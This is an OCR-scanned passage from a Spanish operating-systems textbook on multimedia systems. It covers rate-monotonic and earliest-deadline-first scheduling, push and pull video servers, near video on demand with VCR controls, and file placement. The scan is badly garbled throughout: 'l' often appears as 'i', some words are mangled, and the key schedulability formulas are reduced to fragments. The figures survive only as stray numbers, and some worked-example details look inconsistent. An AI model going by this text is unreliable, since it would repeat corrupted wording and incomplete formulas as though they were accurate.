ro de procesos sea lo suficientemente pequeño como para poder realizar el trabajo durante el tiempo 
de un cuadro, basta con utilizar la programación por turno rotatorio (round-robin). 


7.5.2 Programación general en tiempo real 

Por desgracia, este modelo se aplica raras veces en la realidad. El número de usuarios cambia a me¬ 
dida que los espectadores van y vienen, los tamaños de los cuadros varían mucho debido a la natu¬ 
raleza de la compresión de video (los cuadros I son mucho más grandes que los cuadros P o B), y 
las distintas películas pueden tener diferentes resoluciones. Como consecuencia, los distintos pro¬ 
cesos tal vez tengan que ejecutarse a distintas frecuencias, con diferentes cantidades de trabajo, y 
con distintos tiempos de respuesta para cuando se debe completar el trabajo. 

Estas consideraciones conllevan a un modelo distinto: varios procesos compiten por la CPU, 
cada uno con su propio trabajo y sus tiempos de respuesta. En los siguientes modelos vamos a su¬ 
poner que el sistema conoce la frecuencia a la que se debe ejecutar cada proceso, cuánto trabajo tie¬ 
ne que realizar y cuál es el siguiente tiempo de respuesta (la programación del disco también es un 
aspecto que consideraremos más adelante). La programación de varios procesos que compiten en¬ 
tre sí, de los cuales algunos (o todos) tienen tiempos de respuesta que deben cumplir, se conoce co¬ 
mo programación en tiempo reai. 

Como un ejemplo del tipo de entorno en el que trabaja un programador de multimedia en tiem¬ 
po real, considere los tres procesos A, B y C que muestra la figura 7-13. El proceso A se ejecuta ca¬ 
da 30 mseg (aproximadamente la velocidad de NTSC). Cada cuadro requiere 10 mseg de tiempo de 
la CPU. En la ausencia de competencia, se ejecutaría en las ráfagas Al, A2, A3, etc., cada una empe¬ 
zando 30 mseg después de la anterior. Cada ráfaga de la CPU maneja un cuadro y tiene un tiempo 
de respuesta: se debe completar antes de que empiece la siguiente. 
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Figura 7-13. Tres procesos periódicos, cada uno de ios cuaies muestra una peiícuia. 

Las veiocidades de cuadro y ios requerimientos de procesamiento por cada cuadro son 
distintos para cada peiícuia. 

En la figura 7-13 también se muestran otros dos procesos, B y C. El proceso B se ejecuta 25 
veces/seg (por ejemplo, PAL) y el proceso C se ejecuta 20 veces/seg (por ejemplo, un flujo NTSC 
o PAL de velocidad reducida, destinado para un usuario con una conexión de bajo ancho de banda 
al servidor de video). El tiempo de cómputo por cada cuadro se muestra como de 15 mseg y de 
5 mseg para B y C, respectivamente, sólo para hacer el problema de la programación más general, 
en vez de hacer que todos los tiempos sean iguales. 

L a pregunta de programación es ahora cómo programar A, B y C para asegurar que cumplan sus 
respectivos tiempos de respuesta. Antes de buscar siquiera un algoritmo de programación, tenemos 
que ver si este conjunto de procesos puede programarse. En la sección 2.4.4 vimos que si el proce¬ 
so i tiene el periodo de P,-mseg, y requiere C,-mseg de tiempo de la CPU por cada cuadro, el siste¬ 
ma puede programarse si, y sólo si 


C¡ 


donde m es el número de procesos (en este caso, 3). Observe que C¡/P¡ es sólo la fracción déla CPU 
que está utilizando el proceso i. Para el ejemplo de la figura 7-13, A ocupa 10/30 de la CPU; B, 
15/40 y C, 5/50. En conjunto, estas fracciones suman el 0.808 de la CPU, por lo que el sistema de 
procesos se puede programar. 

Hasta ahora hemos asumido que sólo hay un proceso por flujo. En realidad podría haber dos (o 
más procesos) por flujo, por ejemplo, uno para el audio y otro para el video. Pueden ejecutarse a 
distintas velocidades y consumir distintas cantidades de tiempo de la CPU por ráfaga. Sin embar¬ 
go, al agregar procesos de audio a la mezcla no se modifica el modelo general, ya que estamos su¬ 
poniendo que hay m procesos, cada uno de los cuales se ejecuta a una frecuencia fija con una 
cantidad fija de trabajo necesaria en cada ráfaga de la CPU. 

En ciertos sistemas de tiempo real, los procesos son preferentes y en otros no lo son. En los sis¬ 
temas multimedia, los procesos por lo general sí lo son, lo cual significa que un proceso en peligro 
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de pasarse de su tiempo de respuesta puede interrumpir a ios procesos en ejecución antes de que ei 
proceso en ejecución haya terminado con su cuadro. Ai terminar, ei proceso anterior puede conti¬ 
nuar. Este comportamiento es sóio muitiprogramación, como hemos visto antes. Estudiaremos ios 
aigoritmos de programación de tiempo reai preferentes, ya que no hay objeción para eiios en ios sis¬ 
temas muitimedia, y proporcionan un mejor rendimiento que ios no preferentes. La única preocu¬ 
pación es que si se está iienando un búfer de transmisión en pequeñas ráfagas, ei búfer está 
compietamente heno para cuando iiega ei tiempo de respuesta, por io que se puede enviar ai usua¬ 
rio en una soia operación. En cuaiquier otro caso, se podría introducir fiuctuación. 

Los aigoritmos en tiempo reai pueden ser estáticos o dinámicos. Los aigoritmos estáticos asignan 
a cada proceso una prioridad fija por adeiantado y reaiizan ia programación preferente con priorida¬ 
des utiiizando éstas. Los aigoritmos dinámicos no tienen prioridades fijas. A continuación estudiare¬ 
mos un ejempio de cada tipo. 

7.5.3 Programación monotónica en frecuencia 

Ei aigoritmo de programación de tiempo reai estático ciásico para ios procesos periódicos preferen¬ 
tes es RM S (Rate M onotonic Scheduiing, Programación monotónica en frecuencia) (Liu y Layiand, 
1973). Se puede utiiizar para ios procesos que cumpien con ias siguientes condiciones: 

1. Cada proceso periódico se debe compietar dentro de su periodo. 

2. N ingún proceso es dependiente de otro. 

3. Cada proceso necesita ia misma cantidad de tiempo de ia CPU en cada ráfaga. 

4. Ningún proceso no periódico tiene tiempo de respuesta. 

5. La preferencia de procesos ocurre en forma instantánea y sin sobrecarga. 

Las primeras cuatro condiciones son razonabies. La úitima sin duda no io es, pero faciiita de mane¬ 
ra considerabieei modeiado dei sistema. Ei RMS funciona ai asignara cada proceso una prioridad 
fija, iguai a ia frecuencia de ocurrencia de su evento de activación. Por ejempio, un proceso que se 
debe ejecutar cada 30 mseg (33 veces/seg) obtiene ia prioridad 33, un proceso que se debe ejecutar 
cada 40 mseg (25 veces/seg) obtiene ia prioridad 25, y un proceso que se debe ejecutar cada 50 
mseg (20 veces/seg) obtiene ia prioridad 20. Por io tanto, ias prioridades son iineaiescon ia frecuen¬ 
cia (ei número de veces/segundo que se ejecuta ei proceso). Esto expiica por qué se ie i i ama mono- 
tónica en frecuencia. En tiempo de ejecución, ei programador siempre ejecuta ei proceso que esté 
iisto y tenga ia mayor prioridad, reempiazando ei proceso en ejecución si io necesita. Liu y Layiand 
demostraron que ia RM S es óptima entre ia ciase de aigoritmos de programación estáticos. 

La figura 7-14 muestra cómo funciona ia programación monotónica en ei ejempio de ia figura 
7-13. Los procesos A, B y C tienen prioridades estáticas, 33, 25 y 20, respectivamente, io cuai sig¬ 
nifica que cada vez que A se necesita ejecutar, reempiazando a cuaiquier otro proceso que utiiice ia 
CPU. Ei proceso B puede reempiazar a C, pero no a A. Ei proceso C tienequeesperar a queia CPU 
esté inactiva para poder ejecutarse. 
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Figura 7-14. U n ejemplo de programación de tiempo reai RM S y EDF. 


En la figura 7-14, al principio los tres procesos están listos para ejecutarse. Se selecciona el pro¬ 
ceso de mayor prioridad (A) y se le permite ejecutarse hasta que se completa en 15 mseg, como se 
muestra en la línea RM S. Al terminar, se ejecutan B y C en ese orden. En conjunto, estos procesos 
tardan 30 mseg en ejecutarse, por lo que cuando termina C, es tiempo de que A se ejecute de nue¬ 
vo. Esta rotación continúa hasta que el sistema queda inactivo en t = 70. 

En t = 80, B está listo y se ejecuta. Sin embargo, en t = 90 está listo un proceso de mayor 
prioridad (A), por lo que reemplaza a B y se ejecuta hasta terminar, en t = 100. En ese punto, el 
sistema puede elegir entre terminar B o empezar C, por lo que selecciona el proceso de mayor 
prioridad, B. 

7.5.4 Programación del menor tiempo de respuesta primero 

Otro algoritmo de programación de tiempo real popular es el del Menor tiempo de respuesta pri¬ 
mero. (EDF), que es un algoritmo dinámico que no requiere que los procesos sean periódicos, al 
igual que el algoritmo monotónico en frecuencia. Tampoco requiere el mismo tiempo de ejecución 
por cada ráfaga de la CPU, como el RMS. Cada vez que un proceso necesita tiempo de la CPU, 
anuncia su presencia y su tiempo de respuesta. El programador mantiene una lista de procesos eje¬ 
cutables, ordenados con base en el tiempo de respuesta. El algoritmo ejecuta el primer proceso en 
la lista, el que tiene el tiempo de respuesta más cercano. Cada vez que un nuevo proceso está listo, 
el sistema comprueba que ocurra su tiempo de respuesta antes que el del proceso actual en ejecu¬ 
ción. De ser así, el nuevo proceso reemplaza al actual. 

En la figura 7-14 se muestra un ejemplo de EDF. Al principio los tres procesos están listos. Se 
ejecutan en el orden desús tiempos de respuesta. A debe terminar para t = 30, B debe terminar pa¬ 
ra t = 40 y C debe terminar para t = 50, por lo que A tiene el tiempo de respuesta más cercano y 
por ende va primero. Flasta t = 90, las opciones son iguales que RM S. En t = 90, A vuelve a estar 
listo y su tiempo de respuesta es t = 120, igual que el tiempo de respuesta de B. El planificador po¬ 
dría elegir ejecutar legítimamente cualquiera de los dos, ya que priorizar a B tiene un costo asociado 
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diferente de cero, es mejor dejar que B continúe ejecutándose en vez de incurrir en ei probiema de 
cambiar de procesos. 

Para disipar ia idea deque RMS y EDF siempre dan ios mismos resuitados, veamos otro ejempio 
que se muestra en ia figura 7-15. En este ejempio, ios periodos de A, B y C son iguaies que antes, pe¬ 
ro ahora A necesita 15 mseg de tiempo de ia CPU por cada ráfaga, en vez de sóio 10 mseg. La prueba 
de capacidad de programación caicuia ei uso de ia CPU como 0.500 -i- 0.375 -f 0.100 = 0.975. Sóio 
queda ei 2.5% de ia CPU, pero en teoría ésta no tiene exceso de soiicitudes, por io que debe ser posi- 
bie encontrar una programación iegai. 
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Figura 7-15. Otro ejemplo de la programación en tiempo real con RM S y EDF. 


Con RMS, las prioridades de los tres procesos siguen siendo 33, 25 y 20 ya que sólo importa 
el periodo, no el tiempo de ejecución. Esta vez, B1 no termina sino hasta t = 30, momento en el 
cual A está listo para ejecutarse de nuevo. Para cuando termina A en t = 45, B está listo de nuevo, 
por lo que teniendo una prioridad más alta que C, se ejecuta y a C se le pasa su tiempo de respues¬ 
ta. RMS falla. 

Ahora veamos cómo maneja EDF este caso. En t = 30, hay un concurso entre A2 y C1. Como 
el tiempo de respuesta de C1 es 50 y el de A2 es 60, C se programa. Esto es distinto de RM S, en 
donde la prioridad más alta de A gana. 

En t = 90, A está listo por cuarta vez. El tiempo de respuesta de A es igual que el del proceso 
actual (120), por lo que el planificador ti ene la opción de reemplazar o no. Como antes, es mejor no 
reemplazar si no es necesario, por lo que se permite a B3 completar su ejecución. 

En el ejemplo de la figura 7-15, la CPU está 100% ocupada hasta t = 150. Sin embargo, en un 
momento dado se creará un hueco, ya que la CPU sólo se utiliza en 97%. Como todos los tiempos 
de inicio y de fin son múltiplos de 5 mseg, el hueco será de 5 mseg. Para poder lograr 2.5% del 
tiempo de inactividad requerido, el hueco de 5 mseg tendrá que ocurrir cada 200 meg, lo cual ex¬ 
plica por qué no se muestra en la figura 7-15. 
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Una pregunta interesante es por qué falló el RM S. Básicamente, el uso de prioridades estáticas 
funciona sólo si el uso de la CPU no es demasiado alto. Liu y Layland (1973) demostraron que pa¬ 
ra cualquier sistema de procesos periódicos, si 

m (J. 

í=i “í 

entonces se garantiza que RM S funcionará. Para 3, 4, 5, 10, 20 y 100, los usos máximos permiti¬ 
dos son 0.780, 0.757, 0.743. 0.718, 0.705 y 0.696. Como m oo, el uso máximo es asintótico a 
In 2. En otras palabras, Liu y Layland demostraron que para tres procesos, RM S siempre funciona 
si el uso de la CPU es igual a (o menor que) 0.780. En nuestro primer ejemplo, era 0.808 y RM S 
funcionó, pero sólo tuvimos suerte. Con distintos periodos y tiempos de ejecución, un uso de 0.808 
podría fallar. En el segundo ejemplo, el uso de la CPU fue tan alto (0.975) que no había esperanza 
de que RM S pudiera funcionar. 

Por el contrario, EDF siempre funciona para cualquier conjunto programadle de procesos. Pue¬ 
de lograr 100% de uso de la CPU. El precio a pagares un algoritmo más complejo. Por lo tanto, en 
un servidor de video real, si el uso de la CPU está por debajo del límite de RM S, se puede utilizar 
este algoritmo. En caso contrario, se debe utilizar EDF. 


7.6 PARADIGMAS DE LOSSISTEMAS 
DE ARCHIVOS MULTIMEDIA 

Ahora que hemos visto la programación de procesos en sistemas multimedia, vamos a continuar 
nuestro estudio analizando los sistemas de archivos multimedia. Éstos utilizan un paradigma distin¬ 
to al délos sistemas de archivos tradicionales. Primero veremos un repaso déla E/S de archivos tra¬ 
dicional y después nos enfocaremos en la forma en que se organizan los servidores de archivos 
multimedia. Para acceder a un archivo, un proceso primero emite una llamada al sistema open. Si 
tiene éxito, el proceso que hizo la llamada recibe cierto tipo detoken, conocido como descriptor de 
archivos en UNIX o manejador en Windows, para usarlo en las futuras llamadas. En ese punto, el 
proceso puede emitir una llamada al sistema nead, proporcionando el token, la dirección de búfery 
el conteo de bytes como parámetros. Después, el sistema operativo devuelve los datos solicitados en 
el búfer. Se pueden hacer llamadas adicionales a read hasta que termine el proceso, momento en el 
cual llama a cióse para cerrar el archivo y devolver sus recursos. 

Este modelo no funciona bien para multimedia, debido a la necesidad del comportamiento en 
tiempo real. En especial funciona de manera inadecuada a la hora de mostrar archivos multimedia 
que provienen de un servidor de video remoto. U no de los problemas es que el usuario debe reali¬ 
zar las llamadas a read con un espaciamiento demasiado preciso en el tiempo. U n segundo proble¬ 
ma es que el servidor de video debe ser capaz de suministrar los bloques de datos sin retraso, algo 
que es difícil de hacer cuando llegan las peticiones que no están planeadas y no se han reservado 
recursos por adelantado. 

Para resolver estos problemas, los servidores de archivos multimedia utilizan un paradigma 
completamente distinto: actúan como VCRs (Grabadoras de Video Casete). Para leer un archivo 


494 


SISTEMAS OPERATIVOS MULTIMEDIA 


CAPITULO 7 


multimedia, un proceso de usuario emite una llamada al sistema start, especificando el archivo que 
se va a leer y otros parámetros: por ejemplo, qué pistas de audio y subtítulos utilizar. Después, el 
servidor de video empieza a enviar cuadros a la velocidad requerida. Es responsabilidad del usua¬ 
rio manejarlos a la velocidad a la que llegan. Si el usuario se aburre con la película, la llamada al 
sistema stop termina el flujo. Los servidores de archivos con este modelo de flujo continuo se co¬ 
nocen a menudo como servidores push (debido a que "empujan" los datos hacia el usuario) y se 
contrastan con los servidores puii tradicionales, en donde el usuario tiene que extraer los datos un 
bloque a la vez, llamando repetidas veces a read para obtener un bloque después de otro. La dife¬ 
rencia entre estos dos modelos se ilustra en la figura 7-16. 


Servidor Servidor 

de video Cliente de video Cliente 



(a) (b) 

Figura 7-16. (a) U n servidor pulí, (b) U n servidor push. 


7.6.1 F unciones de control de VC R 

La mayoría délos servidores de video también i mpl ementan funciones de control deVCR estándar, 
incluyendo pausa, adelanto rápido y rebobinado. La pausa es bastante simple. El usuario envía un 
mensaje devuelta al servidor de video, indicándole que se detenga. Todo lo que tiene que hacer en 
ese punto es recordar qué cuadro sigue. Cuando el usuario indica al servidor que puede continuar, 
simplemente continúa desde donde se quedó. 

Sin embargo, aquí hay una complicación. Para lograr un rendimiento aceptable, el servidor 
puede reservar recursos como ancho de banda del disco y búferes de memoria para cada flujo sa¬ 
liente. Si se continúan acaparando estos recursos mientras una película está en pausa se desperdi¬ 
cian recursos, en especial si el usuario planea un viaje a la cocina para localizar, poner en el 
microondas, cocinar y comer una pizza congelada (sobretodo si es extra grande). Desde luego que 
los recursos se pueden liberar con facilidad al momento de pausar la película, pero esto introduce 
el peligro de que, cuando el usuario trate de reanudarla, no se puedan volver a adquirir. 

El verdadero rebobinado en realidad es sencillo, sin complicaciones. Todo lo que el servidor 
tiene que hacer es tener en cuenta que el siguiente cuadro a enviar será el 0. ¿Qué podría ser más 
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sencillo? Sin embargo, el adelanto rápido y el retroceso rápido (es decir, reproducir mientras se re¬ 
trocede) son mucho más complicados. Si no fuera por la compresión, una manera de avanzar a lOx 
la velocidad sería sólo mostrar cada 10-ésimo cuadro. Para avanzar a una velocidad de 20x sólo 
habría que mostrar cada 20-ésimo cuadro. De hecho, sin compresión es fácil avanzar o retroceder 
a cualquier velocidad. Para retroceder a k veces la velocidad normal, se hace lo mismo en direc¬ 
ción opuesta. Este método funciona con la misma efectividad tanto para los servidores pulí como 
push. 

La compresión complica más el movimiento rápido en cualquier dirección. Con una cinta DV 
de cámara de video, en donde cada cuadro se comprime de manera independiente a los demás, es 
posible utilizar esta estrategia, siemprey cuando se pueda encontrar rápido el cuadro necesario. Co¬ 
mo cada cuadro se comprime por una cantidad distinta, dependiendo de su contenido, cada cuadro 
es de diferente tamaño, por lo que no se puede realizar un salto de k cuadros hacia adelante en el 
archivo mediante un cálculo numérico. Además, la compresión de audio se realiza de manera inde¬ 
pendiente de la compresión de video, por lo que para cada video que se muestre en modo de alta 
velocidad, también deberá localizarse el cuadro de audio correcto (a menos que el sonido se apague 
mientras se avanza o retrocede a una velocidad más rápida de lo normal). Por ende, para el avance 
rápido en un archivo DV se requiere un índice que permita localizar los cuadros rápidamente, pero 
por lo menos se puede realizar en teoría. 

Con M PEG este esquema no funciona, ni siquiera en teoría, debido al uso de los cuadros I, P 
y B. Al saltar k cuadros hacia delante (suponiendo que se pudiera realizar) podríamos caer en un 
cuadro P que esté basado en un cuadro I que ya se haya pasado. Sin el cuadro base, es inútil reali¬ 
zar los cambios increméntales a partir de él (que es lo que contiene un cuadro P). M PEG requiere 
que el archivo se reproduzca en forma secuencial. 

Otra manera de atacar el problema es tratar de reproducir el archivo en forma secuencial a 
una velocidad de lOx. Sin embargo, para ello se requiere extraer datos del disco a una velocidad 
de lOx. En ese punto, el servidor podría tratar de descomprimir los cuadros (algo que por lo ge¬ 
neral no hace), averiguar qué cuadro se necesita y volver a comprimir cada 10-ésimo cuadro 
como un cuadro I. Sin embargo, al hacer esto se impone una enorme carga en el servidor. Ade¬ 
más, el servidor tiene que comprender el formato de compresión, algo que por lo general no ne¬ 
cesita saber. 

La alternativa a tener que enviar todos los datos a través de la red al usuario y dejar que se se¬ 
leccionen los cuadros correctos, requiere que la red opere a una velocidad de lOx, lo cual tal vez 
sea posible, pero sin duda no es fácil debido a la alta velocidad a la que tiene que operar general¬ 
mente. 

Dadas estas condiciones, no hay una solución fácil. La única estrategia factible requiere una 
planeación por adelantado. Lo que se puede hacer es construir un archivo especial que contenga, 
por ejemplo, cada 10-ésimo cuadro y comprimir este archivo utilizando el algoritmo M PEG nor¬ 
mal. Este archivo es lo que se muestra en la figura 7-3 como "avance rápido". Para cambiar al mo¬ 
do de avance rápido, lo que debe hacer el servidor es averiguar dónde se encuentra el usuario 
actual mente en el archivo de avance rápido. Por ejemplo, si el cuadro actual es el 48,210 y el archi¬ 
vo de avance rápido se ejecuta a lOx, el servidor tiene que localizar el cuadro 4821 en el archivo de 
avance rápido y empezar a reproducir desde ahí a una velocidad normal. Desde luego que ese cua¬ 
dro podría ser un cuadro B o P, pero el proceso de decodificación en el cliente simplemente puede 
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omitir cuadros hasta que vea un cuadro I. Para retroceder se utiiiza una forma anáioga, mediante un 
archivo preparado en forma especiai. 

Cuando ei usuario cambia de vueita a ia veiocidad normai, se tiene que reaiizar ei truco inver¬ 
so. Si ei cuadro actuai en ei archivo de avance rápido es 5734, ei servidor sóio cambia de vueita 
ai archivo reguiar y continúa en ei cuadro 57,340. De nuevo, si este cuadro no es un cuadro I, ei 
proceso de decodificación en ei iado ciiente tiene que ignorar todos ios cuadros hasta que vea un 
cuadro I. 

Aunque tener estos dos archivos adicionaies sí funciona, ei método tiene ciertas desventajas. 
En primer iugar se requiere cierto espacio adicionai en disco para aimacenar ios archivos adiciona¬ 
ies. En segundo iugar, ei avancey retroceso rápidos se tienen que reaiizar a veiocidades que corres¬ 
pondan a ios archivos especiaies. En tercer iugar, se necesita una compiejidad adicionai para 
cambiar entre ios archivos reguiar, de avance rápido y de retroceso rápido. 

7.6.2 Video casi bajo demanda 

Cuando k usuarios reciben ia misma peiícuia, se impone ia misma carga en ei servidor que cuan¬ 
do reciben k peiícuias distintas. Sin embargo, con un pequeño cambio en ei modeio, es posibieob¬ 
tener considerabies ganancias en ei rendimiento. Ei probiema con ei video bajo demanda es que 
ios usuarios pueden empezar a recibir ei fiujo continuo de una peiícuia en un momento arbitrario, 
por io que si hay 100 usuarios que empiezan a ver una nueva peiícuia aproximadamente a ias 
8 p.M., es probabie que no haya dos usuarios que empiecen a ver ia peiícuia en ei mismo instante 
exacto, por io que no pueden compartir un fiujo continuo. La modificación que hace posibie ia op¬ 
timización es decir a todos ios usuarios que ias peiícuias sóio empiezan a ia hora y después cada 
5 minutos (por ejempio). Así, si un usuario desea ver una peiícuia a ias 8:02, tendrá que esperar 
hasta ias 8:05. 

La ventaja aquí es que para una peiícuia de 2 horas sóio se necesitan 24 fiujos continuos, sin 
importar cuántos Chentes haya. Como se muestra en ia figura 7-17, ei primer fiujo continuo empie¬ 
za a ias 8:00. A ias 8:05, cuando ei primer fiujo se encuentra en ei cuadro 9000, empieza ei fiujo 2. 
A ias 8:10, cuando ei primer fiujo está en ei cuadro 18,000 y ei fiujo 2 está en ei cuadro 9000, em¬ 
pieza ei fiujo 3, y así en io sucesivo hasta ei fiujo 24, que empieza a ias 9:55. A ias 10:00 termina 
ei fiujo 1 y vueive a empezar con ei cuadro 0. A este esquema se ie conoce como video casi bajo 
demanda, ya que ei video en reai i dad no empieza bajo demanda, sino un poco después. 

Aquí, ei parámetro ciave es ia frecuencia con ia que se inicia un fiujo. Si se inicia uno cada 
2 minutos, se requerirán 60 fiujos para una peiícuia de dos horas, pero ei máximo tiempo de espe¬ 
ra para empezar a ver ia peiícuia será de 2 minutos. Ei operador tiene que decidir cuánto tiempo es¬ 
tarán dispuestas a esperar ias personas, ya que entre más tiempo estén dispuestas a esperar, más 
eficiente será ei sistema y se podrán mostrar más peiícuias a ia vez. U na estrategia aiternativa es te¬ 
ner también una opción sin espera, en cuyo caso se inicia un nuevo fiujo ai instante, pero se cobra¬ 
ría más por ese inicio instantáneo. 

En cierto sentido, ei video bajo demanda es como utiiizar un taxi: io iiamamos y viene. Ei ca¬ 
si video en demanda es como usar un autobús: tiene un itinerario fijo y tenemos que esperar ai si¬ 
guiente. Pero ei tránsito en masa sóio tiene sentido si hay una masa. En ei centro de M anhattan, un 
autobús que opere cada 5 minutos puede contar con que recogerá por i o menos unos cuantos pasa- 


SECCION 7.6 PARADIGMAS DE LOSSISTEMAS DEARCHIVOS MULTIMEDIA 497 


Flujo continuo 
0 I 0 

1 

2 

3 

4 

5 

6 

7 

8 
9 


9000 I |18000| 1270001 
0 I I 9000 I I180001 
I 0 I I 9000 I 


El cuadro 9000 
en el flujo 3 se envía 
a las 8:20 min 


8:00 8:05 


8:10 


TU 


36000 


27000 


18000 


9000 


8:15 8:20 

Tiempo - 


45000 


36000 


27000 


18000 


9000 


8:25 


54000 


45000 


36000 


27000 


18000 


9000 


8:30 


63000 


54000 


45000 


36000 


27000 


18000 


9000 


8:35 


72000 


63000 


54000 


45000 


36000 


27000 


18000 


9000 


8:40 


81000 


72000 


63000 


54000 


45000 


36000 


27000 


18000 


9000 


8:45 


Figura 7-17. En el método de casi video en demanda se inicia un nuevo fiujo a inter- 
vaios reguiares, que en este ejempio son cada 5 minutos (9000 cuadros). 


jeros. U n autobús que viaje en las carreteras secundarias de Wyoming podría estar vacío casi todo 
el tiempo. De manera similar, al mostrar la producción más reciente deSteven Spielberg se podrían 
atraer suficientes clientes como para garantizar que se inicie un nuevo flujo cada 5 minutos, pero 
para Lo que el viento se llevó podría ser más conveniente ofrecerla sólo bajo demanda. 

Con el casi video en demanda, los usuarios no tienen controles de VCR. Ningún usuario pue¬ 
de pausar una película para hacer un viaje a la cocina. Lo mejor que se puede hacer es que al regre¬ 
sar de la cocina, cambie a un flujo que haya empezado después, con lo cual verá unos cuantos 
minutos de material repetido. 

En realidad hay otro modelo para el casi video en demanda también. En vez de anunciar por 
adelantado que cierta película específica empezará cada 5 minutos, las personas pueden pedir pelí¬ 
culas cada vez que lo deseen. Cada 5 minutos, el sistema ve qué películas se han pedido y las em¬ 
pieza a reproducir. Con este método, una película puede empezar a las 8:00, 8:10, 8:15 y 8:25, pero 
no en tiempos intermedios, dependiendo de la demanda. Como resultado, no se transmitirán flujos 
sin espectadores, ahorrando ancho de banda de disco, memoria y capacidad de red. Por otro lado, 
atacar el refrigerador es ahora algo arriesgado, ya que no hay garantía de que se vaya a iniciar otro 
flujo continuo 5 minutos después del flujo que el espectador estaba viendo. Desde luego que el ope¬ 
rador puede proveer una opción para que el usuario muestre una lista de todos los flujos concurren¬ 
tes, pero la mayoría de las personas piensan que los controles remotos de su TV tienen ya más 
botones de los necesarios, y no es probable que reciban con entusiasmo unos cuantos más. 
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7.6.3 Video casi bajo demanda con funciones de VCR 

La combinación ideai sería ei video casi bajo demanda (por cuestión de eficiencia) más contro- 
iesdeVCR compietos para cada espectador individuai (para comodidad dei usuario). Con unas 
cuantas modificaciones ai modeio, es posibie un diseño así. A continuación proporcionaremos 
una descripción un poco simpiificada sobre una manera de iograr este objetivo (A bram-Profeta y 
Shin, 1998). 

Empezaremos con ei esquema de video casi bajo demanda estándar de ia figura 7-17. Y agre¬ 
garemos ei requerimiento de que cada equipo ciientecoioqueen un búfer ei AT min anterior, y tam¬ 
bién ei AT min siguienteen forma iocai. Poner en ei búfer eiAT min anterior esfácii; sóio seguarda 
después de mostrado. Poner en ei búfer ei AT min siguiente es más difícii, pero se puede reaiizar si 
ios ciientes tienen ia capacidad de ieer dos fiujos ai mismo tiempo. 

Podemos iiustrar una manera de estabiecer ei búfer mediante un ejempio. Si un usuario em¬ 
pieza a ver ia peiícuia a ias 8:15, ei equipo ciiente iee y muestra ei fiujo de ias 8:15 (que se en¬ 
cuentra en ei cuadro 0). En paraieio, iee y aimacena ei fiujo de ias 8:10, que en ese momento se 
encuentra en ia marca de ios 5 minutos (es decir, en ei cuadro 9000). A ias 8:20 se han aimacena- 
do ios cuadros dei 0 ai 17,999 y ei usuario espera ver ei cuadro 9000 a continuación. De ahí en 
adeiante se abandona ei fiujo de ias 8:15; ei búfer se iiena con ei fiujo de ias 8:10 (que está en ei 
cuadro 18,000) y ia visuaiización se controia desde ia parte media dei búfer (cuadro 9000). A me¬ 
dida que se iee cada nuevo cuadro, se agrega un cuadro ai finai dei búfer y se quita un cuadro dei 
inicio dei búfer. Ei cuadro actuai que se está visuaiizando, conocido como punto de reproduc¬ 
ción, siempre está en medio dei búfer. En ia figura 7-18(a) se muestra ia situación en ei minuto 75 
de ia peiícuia. Aquí todos ios cuadros entre ios minutos 70 y 80 están en ei búfer. Si ia veiocidad de 
datos es de 4 M bps, un búfer de 10 minutos requiere 300 miñones de bytes de aimacenamiento. 
Con ios precios actuaies, sin duda ei búfer se puede mantener en ei disco, y posibiemente en ia 
RAM . Si se desea usar ia RAM , pero 300 miñones de bytes es demasiado, se puede utiiizar un bú¬ 
fer más pequeño. 

A hora suponga que ei usuario decide usar ei adeianto o retroceso rápido. M ientras que ei pun¬ 
to de reproducción permanezca dentro dei rango de 70 a 80 minutos, ia pantaña se puede aiimentar 
dei búfer. No obstante, si ei punto de reproducción se mueve hacia fuera de ese intervaio por cuai- 
quier extremo, surge un probiema. La soiución es activar un fiujo privado (es decir, video bajo de¬ 
manda) para dar servicio ai usuario. Ei movimiento rápido en cuaiquier dirección se puede manejar 
mediante ias técnicas antes descritas. 

Por io generai, en cierto punto ei usuario se adaptará y decidirá ver ia peiícuia a ia veiocidad 
normai otra vez. En este punto podemos pensar en cambiar ai usuario a uno de ios fiujos de video 
casi bajo demanda, para poder quitar ei fiujo privado. Por ejempio, suponga que ei usuario decide 
regresar a ia marca de 12 minutos, como se muestra en ia figura 7-18(b). Este punto está muy aie- 
jado dei búfer, por io que ia pantaña no se puede aiimentar de ahí. Además, desde que ocurrió ei 
cambio (de manera instantánea) a ios 75 minutos, hay fiujos que muestran ia peiícuia en 5, 10, 15 
y 20 minutos, pero ninguno en 12 minutos. 

La soiución es continuar viendo ei fiujo privado, pero empezar a ñenar ei búfer dei fiujo que 
ñeva 15 minutos de ia peiícuia. Después de 3 minutos, ia situación es como se ñustra en ia figura 
7-18(c). A hora ei punto de reproducción es de 15 minutos, ei búfer contiene ios minutos 15 a 18 y 
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Minutos 0 


30 


60 


Punto de reproducción en el minuto 75 
90 120 


(a) 


r 


Punto de reproducción en el minuto 12 


(b) 


-Punto de reproducción en el minuto 15 


(c) 


-Punto de reproducción en el minuto 16 


(d) 


-Punto de reproducción en el minuto 22 


(e) 


Figura 7-18. (a) Situación inicial, (b) Después de retroceder al minuto 12. (c) Des¬ 
pués de esperar 3 minutos. (d) Después de empezar a rellenar el búfer. (e) Búfer lleno. 


los flujos de video casi bajo demanda están en 8,13,18 y 23 minutos, entreoíros. En este punto se 
puede quitar el flujo privado y la pantalla se puede alimentar del búfer. El búfer se sigue llenando 
del flujo que ahora está en el minuto 18. Después de otro minuto, el punto de reproducción es de 
16 minutos, el búfer contiene los minutos del 15 al 19 y el flujo que alimenta el búfer está en el mi¬ 
nuto 19, como se muestra en la figura 7-18(d). 

Después de que transcurren 6 minutos adicionales, el búfer está lleno y el punto de reproduc¬ 
ción está en 22 minutos. El punto de reproducción no está a la mitad del búfer, aunque podría arre¬ 
glarse si fuera necesario. 

7.7 COLOCACIÓN DE LOSARCHIVOS 

Los archivos multimedia son muy grandes, a menudo se escriben sólo una vez pero se leen muchas 
veces y tienden a utilizarse en forma secuencial. Su reproducción también debe cumplir con estric¬ 
tos criterios de calidad. En conjunto, estos requerimientos sugieren distribuciones del sistema de ar¬ 
chivos distintas de las que utilizan los sistemas operativos tradicionales. A continuación hablaremos 
sobre algunas de estas cuestiones, primero para un solo disco y después para varios discos. 
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7.7.1 C olocación de un archivo en un solo disco 

El requerimiento más importante es que ios datos se pueden coiocar en fiujo continuo en ia red o 
en un dispositivo de saiida, a ia veiocidad requerida y sin fiuctuación. Por esta razón, no es muy 
conveniente reai izar varias búsquedas durante un cuadro. U na manera de eii minar ias búsquedas en¬ 
tre archivos en ios servidores de video es utiiizar archivos contiguos. Por io generai, hacer que ios 
